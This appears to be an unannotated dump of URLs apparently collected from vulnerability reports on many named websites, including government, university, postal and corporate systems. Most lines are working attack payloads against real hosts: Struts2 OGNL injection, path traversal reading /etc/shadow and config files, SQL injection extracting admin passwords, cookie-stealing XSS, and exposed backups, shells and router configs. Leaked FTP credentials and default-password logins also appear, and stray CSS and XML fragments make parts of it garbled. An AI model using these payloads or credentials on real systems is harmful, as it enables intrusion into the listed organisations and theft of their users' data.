http://www.gdfs.csg.cn/?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.gdst.csg.cn:80/manager/html/ username:admin http://www.im286.com/phpspy.php http://www.im286.com/1.asp;1.jpg http://www.im286.com/1.asp/2.jpg http://www.im286.com/1.jpg/1.php http://www.tylib.com/tyread/login/logOut.do http://www.tylib.com/tyread/test.txt http://lx.zzz4.com/list.asp?id=181 http://lx.zzz4.com/Stu_Show.asp?id=103 http://bit.tcl.com/ http://bit.tcl.com/phpsso_server/api/uc.php?code=17e6zArAIfR6iqzq592JgVl0r4K%2B%2BgukWcWso8N2As8wG%2Fh6bWh0HG%2BnkIJGBy2BYdhahpbohC6sCiW210k9Kq%2FSj%2F4%2BrWr0E9qqqTjLoTdGtJzTxExL0%2BnwK6KO0NkNL1OneyXIc%2BsOCrt6zBAcnsu%2Bolqdq1nHNulr861WhdO4Gw4zxyqOZW03zIV1fQplEV35U4iJ8aE 
http://bit.tcl.com/phpsso_server/api/uc.php?code=c083du8enogt4QbzvHeM8GbShlbtSbr1V0dDABJcdgCOpa%2Fx15lsCqVq8oKorQoUixsoWalIzsxW6%2FjaHsMSWVZSqhKwXTYjAgFX5JlMGVsM6YmEVWHoNXNoa%2FyNgIRDDHT0H8Vl64GgbsO%2FFT2sQE%2F5ZsQzwwBrybF5kaT%2B3ddNPaHQucnbqNIkBUdOaiBgyNMaxO%2Fd31t0gd7BePoQWAxF76yLx0As6cy8wDUvQ%2BWPlov85G70%2FVvfKzrg3gTQRNMvLgay http://bit.tcl.com/index.php?m=admin&c=index&a=login&pc_hash= http://bbs.paidai.com/topic/191776 http://edu.zzz4.com/list.asp?id=57 http://218.247.135.37:91/Web_sc/login.gn,邮航单点登录系统,用户名是用某种方式设置的,有初始密码,所以尝试了几个就进系统中了。 http://sms.cnpostair.com/login.jsp,中国邮政航空安全管理系统,用户名也是用某种方式设置的,有初始密码,所以尝试了几个就进系统中了。 http://220.178.27.116:8001/background/recievesms.php?ID=1 http://220.178.27.116:8001//background/recievesms.php?ID=1 http://yindajituan.gicp.net:8888 www.kdlian.com:8001 com:8080 cn:8080 cn:8080 com:8088 www.huazhu.com http://www.365bj.com/about/Default/index/id/3.html http://www.baic.gov.cn/infogate/file/file_server_read.jsp?FileName=/../../../../../../../../../etc/shadow http://rz1.ipnoc.cn:8090 http://caiyun.feixin.10086.cn/dl/161fmlOwpIa1 http://wangba.wanmei.com/xljz/getxljzbar.do?search.proId=0&search.cityId=0&search.sectionId=0&search.barName=&page=123 http://wangba.wanmei.com/xljz/getxljzbar.do?search.proId=0&search.cityId=0&search.sectionId=0&search.barName=&page=123 http://wangba.wanmei.com/xljz/getxljzbar.do?search.proId=0&search.cityId=0&search.sectionId=0&search.barName=-- http://juwl.m.taobao.com/admin/item_home.htm www.yoro.com http://admin.yoro.com/ http://admin.yoro.com/advertisement/toAdOfs.html?id=1 http://pan.baidu.com/mbox/homepage#share/type=session http://www.good321.net/web.zip http://www.shic.gov.cn:8080/xxzxbbs/blog_people.jsp?people=615 http://www.czpost.com.cn/ http://golf.cctv.com/e/extend/court/score.php?cid=115&hole=1,参数hole inurl:ucapformsresource inurl:sofpro xxx.com/ucapformsresource/resourceservlet.ucap?key=/../../../../../../../../../../etc/httpd/conf/httpd.conf%00.jpg&filename=1.txt 
http://220.178.27.116:8001//background/festivalremind.php?ID=99999 http://220.178.27.116:8001//background/festivalremind.php?ID=99999 www.kdlian.com:8001 com:8080 cn:8080 http://service.wanmei.com/faxservice/AttachUploadShowAction.do?flag=1&serviceCode=1365171718702 http://service.wanmei.com/faxservice/AttachUploadShowAction.do?flag=1&serviceCode=1365171718702 http://service.wanmei.com/faxservice/AttachUploadShowAction.do?flag=1&serviceCode=1365171718702 http://passport.wanmei.com/sso//accounts/serviceLogin?continue=http://tg.wanmei.com:80/SSOServerLogin&service=qdwmqc&location=2f70617373706f72742f696e666f2e6a7370&encryptType=RSA&isiframe=1&CSSStyle=http://tg.wanmei.com:80/passport/style/iframecss.css&mydate=0.9401589958864233&mydate=0.6164330805626539 http://gz.ifeng.com/zaobanche/detail_2014_06/26/2494927_0.shtml http://news.ifeng.com/a/20140627/40919389_0.shtml www.cmec.com进行友情检测吧 www.tietu.com ip:118.186.217.77 http://page.renren.com/601633405 http://baike.baidu.com/view/1726431.htm http://tech.sina.com.cn/i/2013-01-21/11057999317.shtml http://202.108.154.209/datacenter/# https://atservice.intel.com/login.action https://atservice.intel.com/login.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://wan.07073.com/.svn/entries http://dota2.07073.com/static/upload/ http://bbs.qibosoft.com/down2.php?v=v7#down http://192.168.1.108/e/order/order1.aspx?s=1&table=product&id=28 order1:Page http://ebaotong.com:8080/ebt/pty/loginSystem.action http://ebaotong.com:8080/ebt/x.jsp http://125.ahncgl.org/login.action http://www.autohome.com.cn/ashx/AjaxAccountInfo.ashx?users=3914441 
http://www.autohome.com.cn/ashx/AjaxAccountInfo.ashx?users=3914441 http://www.exploit-db.com/exploits/30085/ https://mail.iboxpay.com/zimbra/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 http://yunfeng.zju.edu.cn/news.php?action=show&id=4036 http://dqxy.zju.edu.cn/news.php?action=show&id=7553 www.qsng.cn inurl:/helper/reg.do http://www.tzqsng.com/helper/reg.do http://www.huzhouqsng.com/helper/reg.do http://www.wzqsn.com/helper/reg.do http://www.txqsng.cn/helper/reg.do http://sdh.zjsxd.org/helper/reg.do http://www.cnqsng.cn/helper/reg.do http://www.ajqsn.com/helper/reg.do http://www.nhqsng.com/helper/reg.do http://www.yhqsng.com.cn/helper/reg.do http://www.wlqsng.cn/helper/reg.do http://www.jnqsng.cn/helper/reg.do http://www.jdqsng.com/helper/reg.do http://www.wzstx.net/helper/reg.do http://ip:port/ServiceAction/com.velcro.base.DataAction?sql=select/**/@@VERSION http://www.baidu.com/s?wd=%E6%B5%81%E7%A8%8B%E7%AE%A1%E9%81%93%2C%E7%9F%A5%E8%AF%86%E6%B4%BB%E6%B0%B4&rsv_spt=1&issp=1&rsv_bp=0&ie=utf-8&tn=baiduhome_pg&rsv_sug3=1&rsv_sug4=64&inputT=692 http://kms.kogc.com.cn/ServiceAction/com.velcro.base.DataAction?sql=select/**/@@VERSION http://www.hnxzsp.gov.cn/VerifyImageAction http://zfxx.haining.gov.cn/bsdt/VerifyImageAction http://swift.51mrp.com/mopo/index.html http://4g.roboo.com/ http://as.baidu.com/a/item?docid=4154506839&f=web_alad_2_2 http://down.chinaz.com/soft/34989.htm http://www.nj12320.org/njmine/findPassword.do?type=start http://www.nj12320.org/njres/ http://www.hnleader.gov.cn/Index/City/ViewCityNews/?NewsID=4592 http://market.m.taobao.com/go/market/diandian/catetime.php# http://www.ecosopp.com https://hr.minshengec.cn/hrss/login.jsp http://wenku.baidu.com/view/252b4448e518964bcf847ccb?fr=prin https://hr.minshengec.cn/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml https://hr.minshengec.cn/login.jsp 
http://www.huazhu.com/myht/InvoiceManage.ashx http://www.yf1668.com/index.asp http://112.124.41.23:38888/ http://112.124.41.23:38888/Default.aspx http://112.124.41.23:38888/NWorkFlow/NWorkFlowReView.aspx?WorkFlowID=31 http://112.124.41.23:38888/NWorkFlow/NWorkFlowReView.aspx?WorkFlowID=31 http://112.124.41.23:38888/SystemManage/SystemUser.aspx http://112.124.41.23:38888/FGOA_NetDisk/NetDisk.aspx?ID=1&SubDir=C:\Program http://112.124.41.23:38888/FGOA_NetDisk/NetDisk.aspx?ID=1&SubDir=D:\ http://112.124.41.23:38888/FGOA_NetDisk/NetDisk.aspx?ID=1&SubDir=D:\OA_SITE\FGOA2014\Web9.2.2.7 http://112.124.41.23:38888/UploadFile/635395514206637345.aspx http://dthb.bjedu.cn/checkcmisa.php http://www.umeweb.cn/ http://218.6.145.99:8088//cmis/common/usersAction_login.action http://club.voicecloud.cn/static/image/common/logo.png/.php http://demo.pageadmin.net/index.aspx?lanmuid=68&sublanmuid=635&id=1 http://demo.pageadmin.net/index.aspx?lanmuid=68&sublanmuid=635&id=2 http://demo.pageadmin.net/index.aspx?lanmuid=68&sublanmuid=635&id=10 http://etl.moonbasa.com/recommend.aspx?callback=jQuery17 http://a.vupload.duowan.com/index.php?r=recommend/get&channel%5Fid=cod&letv%5Fvideo%5Funique=dee5673396 http://a.vupload.duowan.com/index.php?r=anuncio/getanuncio http://player.vupload.duowan.com/index.php?r=videoservice/get&video%5Fid=139770260956853710&letv%5Fvideo%5Funique=dee5673396 http://sso.gdems.com/sso/login http://www.emscz.com:8080/login.jsp http://www.czpost.com.cn/admin/login.asp http://61.163.228.116:7001/login.jsp http://sswz.spb.gov.cn/logout.do http://www.10008.co/ www.10008.co http://www.10008.co http://www.sqjrw.cn/_database/5d7525e61ca2ae39.mdb http://jw.sicnu.edu.cn/show.asp?id=551 http://jw.sicnu.edu.cn/show.asp?id=551 http://jw.sicnu.edu.cn/show.asp?id=551 http://jw.sicnu.edu.cn/show.asp?id=551%20and%201=1%20union%20select%201,username1,3,4,5,6,password1,8,9,10,11%20from%20admin http://jw.sicnu.edu.cn/login.asp http://www.kmpsoft.com/index.htm 
http://www.kmpsoft.com/solution.htm http://demo.kmpsoft.com/ http://www.douban.com/j/app/login?email={email}&password={password}&app_name=radio_desktop_win&version=50 http://www.cites-sh.com.cn/user!indexPage.do http://bbs.wan.58.com/static/image/common/flvplayer.swf?file=http://www.p-ye.cn/1.flv&autostart=false&image=http://www.url.com/images/banner.jpg&linkfromdisplay=true&link=javascript:alert%281%29 http://www.zhihu.com/question/21596439 http://118.194.166.130/ http://118.194.166.130:81/ http://www.lnjxt.net http://www.lnjxt.net/jxt_web/res/resinfo.jsp?file_id=1141&res_sort=2 http://www.lnjxt.net/admin/index.jsp,用户名lnjxt_login http://so.126disk.com/search?key=1 http://sfjd.miit.gov.cn/InfoAction!showDetail.action http://sfjd.miit.gov.cn/kindeditor/cmd.jsp?cmd=net http://www.ttyoa.com/WebDst/index.htm?TopMenu=sy http://www.ttyoa.com/Main3/sy.jsp http://www.ttyoa.com/Common/Js/WebEdit/UploadFile.action.jsp?objWebEditName=myWebEdit&Yuan_FileName=404.jsp&IdTime=2014-06-29-5-29-20&FileName=Upload_2014-06-29-5-29-20_404.jsp&szUpLoadPath=DB&Upload_Div_FuJian=myWebEdit_UploadShow&UploadType=File http://www.ttyoa.com/Common/Js/WeiBoEdit/UploadFile.action.jsp?objWeiBoEditName=myWebEdit&Yuan_FileName=404.jsp&IdTime=2014-06-29-5-29-20&FileName=Upload_2014-06-29-5-29-20_404.jsp&szUpLoadPath=DB&FileType=File http://www.ttyoa.com/Qxk/SysManage/Person/UploadFile.action.jsp?Yuan_FileName=404.jsp&IdTime=2014-06-29-5-31-48&FileName=WeiBo_2014-06-29-5-31-48_404.jsp&szUpLoadPath=OA/DB&Yuan_Path=404.jsp&LeiXing=2 http://www.ttyoa.com/WebDst/index.htm?TopMenu=sy http://www.ttyoa.com/Main3/sy.jsp http://www.ttyoa.com/Common/Js/UploadEx/do_download.jsp?UpLoadPath=/Common/Js/UploadEx/&FileName=do_download.jsp http://active.game.xunlei.com/blog/wp-login.php,wordpress,多个用户弱口令: http://member.china-pub.com/member/mypub/pub_orderlist.aspx页面,我的订单下拉列表会触发一个get请求,内容如下: http://survey.ifeng.com/api/resultflashdata.php?surveyId=8133&format=json&type=survey&time=1337256627597 
http://211.103.239.83:8090/tb/login.jsp http://bbs.t2cn.com/static/image/common/flvplayer.swf?file=http://www.p-ye.cn/1.flv&autostart=false&image=http://www.url.com/images/banner.jpg&linkfromdisplay=true&link=javascript:alert%28document.cookie%29 https://www.google.com.hk/webhp?hl=zh-CN&sourceid=cnhp#hl=zh-CN&newwindow=1&q=inurl:/custom/GroupNewsList.aspx&safe=strict&start=50 http://bbs.anzhi.com/config/.config_global.php.swp http://data.ucweb.com/ucweb_admin/login.php http://121.14.161.216:8039/ http://group.fumu.com/config/config_ucenter.php.bak http://ie.sogou.com/ http://121.192.179.132:81/ems/index.php?m=apply&c=apply&a=search http://i3.wkimg.com/config.inc.php.bak http://www.jledu.gov.cn/chengji_2014.php?ksh=考生号&xm=姓名 http://www.jledu.gov.cn/chengji_2014.php?ksh='&xm= http://www.jledu.gov.cn/chengji_2014.php?ksh=\&xm=or%20ksh=14220821150199%23 http://www.jledu.gov.cn/chengji_2014.php?ksh=\&xm=or%20ksh=14220821150199%23 http://www.jledu.gov.cn/chengji_2013.php?ksh=\&xm=or%20ksh=13220821150199%23 http://www.jledu.gov.cn/chengji_2012.php?ksh=\&xm=or%20ksh=12220821150199%23 http://www.jledu.gov.cn/chengji_2011.php?ksh=\&xm=or%20ksh=11220821150199%23 http://www.jledu.gov.cn/luqu_2013.php?kshb=考号&xmb=姓名 http://dealer.xcar.com.cn/d/search/s.htm http://wifi.liebao.cn/hd/wifikong/result.php?id=15636 http://demo.cnnitc.com/download.php?tfile=\..\..\config.php http://pan.wxhand.com/ http://221.122.51.13/ http://youxi.vip.qq.com/game/zhuanqu/v5.html?id=cf&ADTAG=youxi.vip.qq.com/game/zhuanqu/v5.html&SNO=1404046447255 http://pinyin.sogou.com/bbs/ http://bbs.maxthon.cn/forum.php http://jh.ourgame.com/jh.ourgame.com.rar http://dev.focus.cn/common/modules/survey.tar.gz site:img.china.alibaba.com site:img.china.alibaba.com site:img.china.alibaba.com http://img.china.alibaba.com/club/upload/user/8/b/e/4/8be42260fe52cc084be3e8482f0ad56c.txt http://www.bjstats.gov.cn/wwhd/QueryFaq3.do http://58.215.183.168/ http://58.215.183.169/ http://58.215.183.172/ 
http://地址/manager_log_conf_t.gch http://地址/manager_dev_config_t.gch http://地址/manager_dev_defcfg_t.gch http://58.255.211.141/manager_dev_defcfg_t.gch http://地址/manager_log_conf_t.gch http://地址/manager_dev_config_t.gch http://地址/manager_dev_defcfg_t.gch http://58.255.211.141/manager_dev_defcfg_t.gch http://edu.chanjet.com/Exam.rar http://bbs.11186.com/uc_server/ http://bbs.aqgj.cn/ http://dc.km.gov.cn/gov/list.ashx?id=1 http://dbcx.km.gov.cn/JyjSearch.asp?Check=list&@f_zhengxie_num=126 http://cr.ctbu.edu.cn/ http://cif.ctbu.edu.cn/ http://vip.esf.focus.cn/ http://bbs.kingsoft.com/ http://bbs.wps.cn http://www.sparklan.com/p2-products-detail.php?PKey=c33dIvahuWbzpkuB-Mvy1_Fz0DmF0T8VP_GG7A5Vzic&CAS-673W cn:8080 inurl:ProductShow.asp?ArticleID= inurl:ProductShow.asp?ArticleID= inurl:ProductShow.asp?ArticleID= http://www.aywsxxw.com/ http://zjcsnz.zje.net.cn/ http://hbkd.hdt.net.cn/ http://press.ujs.edu.cn/ http://nyhg.nxtc.edu.cn/ http://jpkc.sdili.edu.cn/ http://www.xaau.edu.cn/ http://sz.jnu.edu.cn/ http://www.dyfg.gov.cn/ http://mmzx.maoming.gov.cn/ http://www.lldm.gov.cn/ http://www.lchfda.gov.cn/ http://www.fmxgaj.gov.cn/ http://www.jsxyjs.gov.cn/ http://www.xyqts.gov.cn/ http://61.134.97.248/ http://www.jiesc.com/ http://www.xyslj.gov.cn/ http://www.tqjcy.gov.cn/ http://o.p.dianping.com/http/orderReturn?msg=%3Cscript%3Edocument.getElementsByClassName%28%27box-cont%20box-cont-w%27%29[0].innerHTML=%27%3Ch2%3E%E6%94%AF%E4%BB%98%E6%88%90%E5%8A%9F%3C/h2%3E%E4%BB%98%E6%AC%BE%E5%AE%8C%E6%88%90%27%3C/script%3E http://gjsxy.imut.edu.cn/admin/user_login.asp http://glxy.imut.edu.cn/jpinkcheng/news/manage/login/login.asp http://www.ies.imut.edu.cn/EduAdmin/Admin_Login.aspx http://www.lib.imut.edu.cn/dtxw/news/5531.html http://www.ies.imut.edu.cn/SchoolMate/SchoolMateList.aspx?C_ID=1117 http://220.181.47.7/login.php http://t.cn/RvG5w6B http://item.taobao.com/item.htm?spm=a230r.1.14.24.MGOHvR&id=391369** http://tbodn.com/pj.css http://tbodn.com/pj.css 
http://fuwu.taobao.com/ser/detail.htm?spm=a1z13.1113643.1113643.37.LxWCue&service_code=TADGET_SHOP_TACTIC&tracelog=search&scm=&ppath=&labels= tbodn.com/pj.css http://community.bank.ecitic.com/CommunityWcm/ccbcache/zh/ns:LHQ6OCxmOjEzLGM6LHA6LGE6LG06/channel.vsml http://point.4006055885.com/ http://www.4006055885.com/tjoa/ www.51dns.com http://218.28.172.10/oa/loginPwd.jsp http://www.gdmz.gov.cn/bbs/forumdisplay.php?fid=1++&extra%5B%5D=page%3D1#pid1453 http://www.gdmz.gov.cn/xampp/ http://ygb.tongji.edu.cn/information.php?newsid=49 url:http://www.finereason.com http://loudong.360.cn/company/info/id/43 http://www.56top.cn/queryStartDeployOrderCargoInfo.action http://www.ems.com.cn/ec-web/findPassword/findPasswordIndex.action https://mail.11185.cn/logon/findPasswordThree.do?username=test@11185.cn&type=m http://www.finereason.com/ url:http://www.finereason.com https://yp.bianfeng.com/dashboard/pages/ https://yp.bianfeng.com/dashboard/pages/optool_webport_list.html ftp://download:iRVnsT,mj@115.238.24.173:6005/HuaiAn ftp://download:iRVnsT,mj@115.238.24.173:6005/HuaiAn ftp://webupload:wTVPxBybVn@210.51.31.123:6005/xml http://yp.bianfeng.com:8080/phpinfo.php https://yp.bianfeng.com/inner/operation/source/.svn/entries http://地址/manager_dev_config_t.gch http://58.255.222.203/manager_dev_config_t.gch http://m.aibo123.com/bet/betbifenData.do http://地址/rom-0 http://27.37.52.36/rom-0 http://地址/getpage.gch?pid=1002&nextpage=manager_log_conf_t.gch http://地址/getpage.gch?pid=1002&nextpage=manager_dev_config_t.gch http://地址/getpage.gch?pid=1002&nextpage=manager_dev_defcfg_t.gch http://27.37.53.126/getpage.gch?pid=1002&nextpage=manager_dev_defcfg_t.gch http://app.hebwst.gov.cn:30000/hebxzwsxt/ http://221.192.132.203:8091/zyxtgl/login.jsp?error=0 http://comp.yonyou.com//shell.jsp http://comp.yonyou.com/hr/sm/Sm_index.action;jsessionid=BD01456221D66A12061773C6EE4315D0 http://mail.bjhjyd.gov.cn/admin/password.php?password=admin&password2=admin http://地址:8081/param.file.tgz 
http://125.93.86.75:8081/param.file.tgz http://u6dmp.ufida.com.cn http://www.wishtech.com.cn/ http://www.wishtech.com.cn/aboutus/custemers.shtml http://210.56.192.102 http://210.56.192.102/qwareinfo/oa/pubinfo/document/mydoc.json?_dc=1404109910298 http://210.56.192.102/qwareinfo/oa/pubinfo/document/mydoc.json?_dc=1404109910298 http://bbs.aili.com/forum.php http://www.library.tjau.edu.cn/webs/down.action http://ssp.tjrac.edu.cn/TJRAC/downloadCompetition.action http://editor.tudou.com/_sysadmin/program/ag_examine/iteminfo_check.php http://www.jdxb.cn/oa/pdfdow.aspx?Type=pdf&FileName=../../Web.config inurl:/oa/pdfdow.aspx?Type=pdf http://www.sgzx.fx.edu.sh.cn:80/ www.sgzx.fx.edu.sh.cn http://地址:8080/param.file.tgz http://112.93.42.26:8080/param.file.tgz http://jtamis.moc.gov.cn:8091/statisticchart0.asp?uc=200 http://hudong.moc.gov.cn:2517/advice/listAdvice.jsp?topicID=2 http://www.upforum.org/current.php?id=320 http://www.upforum.org/admin/login.php database:nusp1g1_db http://202.97.136.46:8088/ http://202.97.136.46:8088/cnms/admin.aspx http://job.tianji.com/career/candidate/resume/index http://club.suning.com/forum.php http://zs.snut.edu.cn/AudaZSH/Main/List.aspx?TypeID=09 http://emp.caac.net/Caacjy/List.aspx?typeID=10 http://219.244.0.13/yauEmpWeb/main/list.aspx?ID=01&Flag=%E6%96%B0%E9%97%BB%E5%85%AC%E5%91%8A http://219.244.0.28/studYAU/project6/List.aspx?typeID=31 http://xsc.caac.net/StudOnly/Project6/List.aspx?typeID=31 http://game.pipi.cn/initPay.action?game_id=8 http://www.t3.com.cn/member/packageDetail/packageId/3210703866875 http://地址:1080/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd http://地址:1080/bsc_wlan.php?NO_NEED_AUTH=1&AUTH_GROUP=0 http://地址:1080/st_device.php?NO_NEED_AUTH=1&AUTH_GROUP=0 http://61.144.106.232:1080/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd http://pay.xiaojukeji.com/activity/hongbao/r_redpacket/r_get_strive_list?listid= http://www.szmtaqsczrjdw.gov.cn/webPages/newsPage/InfoListRight.aspx?ParentId=Type001001012 
http://www.xzsajd.gov.cn/Web/webPages/newsPage/InfoListRight.aspx?ParentId=Type001001012 http://dflz.jccftxw.cn//newsPage/InfoListRight.aspx?ParentId= http://www.lfspaq.gov.cn/webPages/newsPage/InfoListRight.aspx?ParentId=Type001001012 http://www.99jianzhu.com/down.php?file=%2Fuploads%2Fsoft%2F20130922%2FdRgzIdtL2AkjR60.doc http://go108.astro.women.sohu.com/wish_tree_wished.php?id=15551 http://www.szrtc.cn/ http://www.szrtc.cn/Home/Register http://alumni.sjp.buaa.edu.cn/image.asp http://archives.buaa.edu.cn/htmleditor/ http://archives.buaa.edu.cn/showContent.aspx?columnID=a012f24a-025c-4411-87d6-43a695413720&recID=579&tabName=column_47 http://artgallery.buaa.edu.cn/Rules/List.aspx?id=173 http://bhfx.buaa.edu.cn/index.php?menuid=38&artid=1251&option=com_content&module=24&sortid= http://cgtg.buaa.edu.cn/link/.svn/entries http://fld.buaa.edu.cn/Interedu/List.aspx?id=262 http://fxy.buaa.edu.cn/dispnews.php?newsid=1835&pmenuid=90 http://hq.buaa.edu.cn/cmsfront/cmsQueryAction.do http://kf.buaa.edu.cn/doLogin.do http://math2.buaa.edu.cn/.bash_history http://math2.buaa.edu.cn/.ssh/known_hosts http://math2.buaa.edu.cn/.viminfo http://py.youth.buaa.edu.cn/user/login.action http://sae.buaa.edu.cn/News/List.aspx?id=211 http://sq.buaa.edu.cn/cmsfront/guestbook_doAddGuestBook.do http://transportation.buaa.edu.cn/Research/list.aspx?id=129 http://tyb.buaa.edu.cn/Mass/workcontent.php?page=1&id=99 http://www.me.buaa.edu.cn/index.php?moduleid=m2041_news&articleid=10&categoryid=120&m2041_articleid=10%27 http://www.me.buaa.edu.cn/modules/m2001_news/download_file.php?filename=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://yey.buaa.edu.cn/cmsfront/cmsQueryAction.do http://yuanhang.buaa.edu.cn/studentinfo.aspx?m=20130813115132977135&n=20130813120716290150 http://124.205.18.174:7001/manager/status http://www.crbcint.com/lqcms/net/Issueinfo.action?infoId=8a8db38d46745003014684ed6a720007&column=8a8d83831e4f7064011e5c4dcb3a0f32&version=3&channel=1 
http://manager.17k.com/站配置不当获取数据库密码 http://manager.17k.com/WEB-INF/applicationContext-slave.xml http://118.244.193.247:28017/ http://114.255.218.226:8080/Content/css/login.css/a.php https://114.255.218.252/css/index.css/a.php http://211.147.211.94:8083/Styles/Default/main.css/a.php https://sdyp.bnu.edu.cn/css/index.css/a.php http://219.142.121.10:8081/login.do http://219.142.121.10:8081/reg/create.do http://219.142.121.10:8088/jiaowu.rar http://irs.bnu.edu.cn/wwwroot.rar http://219.142.121.10:8088/announceboard.asp?AnnounceId=61 http://sss.bnu.edu.cn/morenews.php?id=1 http://219.224.18.165:81/ http://cws.bnu.edu.cn/showPic.jsp?id=100 http://env.bnu.edu.cn/view.php?id=1120 http://geogother.bnu.edu.cn/jsjz/ http://scett.bnu.edu.cn/Channel.aspx?first=dangjian http://pdn.cea.bnu.edu.cn/cmaClassAction.fo?classhot=0&method=classHotView http://www.scett.bnu.edu.cn/Channel.aspx?first=ditu http://wx.bnu.edu.cn/C24H/ViewShow?Serial=008e9a2a-4b53-48fe-af29-a35a010d260c http://xsc.bnu.edu.cn/xsc1/show.php?item_id=2148&accessory= http://as.baidu.com/a/item?docid=4185242 http://as.baidu.com/a/item?docid=3705682 http://192.168.10.70/BEES_V3.4_R_20140421/admin/admin_template.php?nav=list_tpl&admin_p_nav=tpl width:10% text-align:center width:10% text-align:center width:10% text-align:center width:100% height:500px font-size:12px http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> http://www.w3.org/1999/xhtml"><head> http://222.73.2.20:8080/main/login.aspx http://118.145.19.72/product_list.php?cat=3 http://www.xf-express.com.cn/ http://www.xf-express.com.cn/web.rar http://temai.baidu.com/Index/index?qid=1404205496416644&tn=more&zt=more&pvid=1404205521151109&from=searchinput&wd=aaa%22/onmouseover=%22alert%28document.cookie%29&bid=0&cid=0&from=searchinput http://gitlab.hiwemeet.com:28017/ http://地址/rom-0 http://60.179.182.191/rom-0 inurl:viewOrder.action?ordersId= http://www.wangpiao.com/CardInfo/dh/ Author:Tea Date:2014/05/21 http://60.28.43.83:8000/gaokaochafen/ 
http://60.28.43.83:8000/gaokaochafen/index.jsp http://地址/status_dev_info_t.gch http://地址/manager_dev_config_t.gch http://地址/wlan_security.gch http://地址/manager_log_conf_t.gch http://60.186.188.76/status_dev_info_t.gch http://www.hengan.com/dl_pdf.php?u=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://purenetworks.com/HNAP1/GetWanSettings http://112.4.19.17/egbi/channelLogin.do?param=B490539B343D32528C9B8C694F58029D85FCCE9E98E552338C19EEAA7806AE66E88A545AB474BF80EB47CF605528B400888C6DA16B09FFD1 http://xgui.sdo.com/news/ListNews.aspx?channel=21&page=2 php:68行 http://218.108.130.11:8888/yun/watonecloud/cloud!forwardOrderPage.do?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://intranet.super8.com.cn/classes.asp http://intranet.super8.com.cn/Module_Manage.asp http://intranet.super8.com.cn/Hr.asp http://intranet.super8.com.cn/documents.asp http://intranet.super8.com.cn/Teachers.asp http://intranet.super8.com.cn/inc/upfile.htm http://long.zhuoyou.com/bbs/robots.txt%00.php http://long.zhuoyou.com/bbs/uc_server http://css.wangjiu.com/ http://css.wangjiu.com//WEB-INF/web.xml http://java.sun.com/xml/ns/j2ee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd classpath:freemarker-methods.xml http://css.wangjiu.com/login.jsp http://online.wangjiu.com/login.action http://www.ttyoa.com/OA/DemoPro/MainFrame.jsp?nCurPage=1&OrderBy=ID&IfDesc=desc&MingCheng=asdada&Link=aaa http://www.ttyoa.com/OA/DemoPro/MainPrint.jsp?OrderBy=ID&IfDesc=%20desc%20&iNum=7&MingCheng=&Link= 
http://www.ttyoa.com/OA/SysManage/JueSe_S/Save.jsp?PAGE=1&OrderBy=ID&IfDesc=asc http://www.ttyoa.com/OA/SysManage/JueSe_H/Save.jsp?PAGE=1&OrderBy=ID&IfDesc=asc http://www.ttyoa.com/OA/SysManage/DeskTop/Save.jsp?PAGE=1&OrderBy=ID&IfDesc=asc http://110.249.253.234/后,在中间位置有个人公积金账户查询的模块。输入身份证号及姓名后,使用默认的初始密码000000即可顺利登录个人管理页面。在密码修改模块修改一个密码之后,就可以查新该用户的公积金剩余情况。 http://house.xizi.com/index.php?m=agent&c=outlet&a=outlet_sale&aid=23 http://buy.xizi.com/index.php?m=gift&c=index&a=ajax_get_day_stock&pid=10330&sid=4331 http://hm.xizi.com/?m=government&c=shops&a=show&sid=652&id=1711 http://yiliao.hupan.com/api/wxuser/nameCard.json?userId=登陆的账号&token=登陆账号的token&username=手机号或账号 http://wxapi.taobao.com/api/wxuser/nameCard.json?userId=登陆的账号&token=登陆账号的token&username=手机号或账号 http://www.mzwater.gov.cn/ShowArtitle.aspx?id=3909 http://demo.huijumall.com/ http://demo.huijumall.com/uploadfiles/20140702105750080.asp http://wooyun.org/bugs/wooyun-2014-058538 http://demo.zzcms.net/uploadimg_form.php?noshuiyin=1 http://demo.zzcms.net/admindoes.txt http://qtnews.zjol.com.cn/ydt/storelist_1.asp http://qtnews.zjol.com.cn http://www.e-tiller.com/ch/index.aspx http://best.alljournals.cn/zgnxtb/ch/index.aspx http://study.21cnedu.com/HtmlWeb/110000/4903/index.html www.wwfchina.org/publication.php?programme=2 http://www.tobaccobid.com/admin/login.jsp http://www.bosideng.cn/Home/P?k=123 